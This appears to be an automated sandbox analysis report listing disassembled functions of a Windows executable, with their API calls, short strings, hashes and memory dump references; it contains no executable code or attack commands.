                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                            • API String ID: 621800784-4108050209
                                                                                                                                                                                                                                                            • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                                                                                                                                                                                            • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                                                                                                                                                                                                            Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32 ref: 004781CE
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                                                                                                                                                                                                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                                                                                                                                                                                                            • String ID: \VH
                                                                                                                                                                                                                                                            • API String ID: 3884216118-234962358
                                                                                                                                                                                                                                                            • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                                                                                                                                                                            • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                                                                                                                                                                                                            Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                                                                                                                                                                                                            • IsMenu.USER32(?), ref: 0044854D
                                                                                                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                                                                                                                                                                                                            • DrawMenuBar.USER32 ref: 004485AF
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                            • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                                            • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                                                                                                                                                                            • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                                                                                                                                                                                                            Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                                                                                                                                                                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend$_memmove_wcslen
                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                            • API String ID: 1589278365-1403004172
                                                                                                                                                                                                                                                            • Opcode ID: 2982a8b4e132ea2dcbe32ac967b71e6e496619b6b285040aa1baae5d263946ef
                                                                                                                                                                                                                                                            • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2982a8b4e132ea2dcbe32ac967b71e6e496619b6b285040aa1baae5d263946ef
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                                                                                                                                                                                                            Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Handle
                                                                                                                                                                                                                                                            • String ID: nul
                                                                                                                                                                                                                                                            • API String ID: 2519475695-2873401336
                                                                                                                                                                                                                                                            • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                                                                                                                                                                            • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                                                                                                                                                                                                            Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Handle
                                                                                                                                                                                                                                                            • String ID: nul
                                                                                                                                                                                                                                                            • API String ID: 2519475695-2873401336
                                                                                                                                                                                                                                                            • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                                                                                                                                                                            • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                                                                                                                                                                                                            Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                                                                                                                                                                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 00401C41
                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 00401C5D
                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                                                                                                                                                                                                            • String ID: Line:
                                                                                                                                                                                                                                                            • API String ID: 1874344091-1585850449
                                                                                                                                                                                                                                                            • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                                                                                                                                                                            • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                                                                                                                                                                                                            Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: SysAnimate32
                                                                                                                                                                                                                                                            • API String ID: 0-1011021900
                                                                                                                                                                                                                                                            • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                                                                                                                                                                            • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                                                                                                                                                                                                            Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                              • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                                                                                                                                                                              • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                                                                                                                                                                              • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                                                                                                                                                                              • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                                                                                                                                                                            • GetFocus.USER32 ref: 0046157B
                                                                                                                                                                                                                                                              • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                                                                                                                                                                                                              • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                                                                                                                                                                                                            • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 00461608
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                                                                                                                                                                                                            • String ID: %s%d
                                                                                                                                                                                                                                                            • API String ID: 2645982514-1110647743
                                                                                                                                                                                                                                                            • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                                                                                                                                                                            • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                                                                                                                                                                                                            Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                                                                                                                                                                            • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                                                                                                                                                                                                            Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                                                                                                                                                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
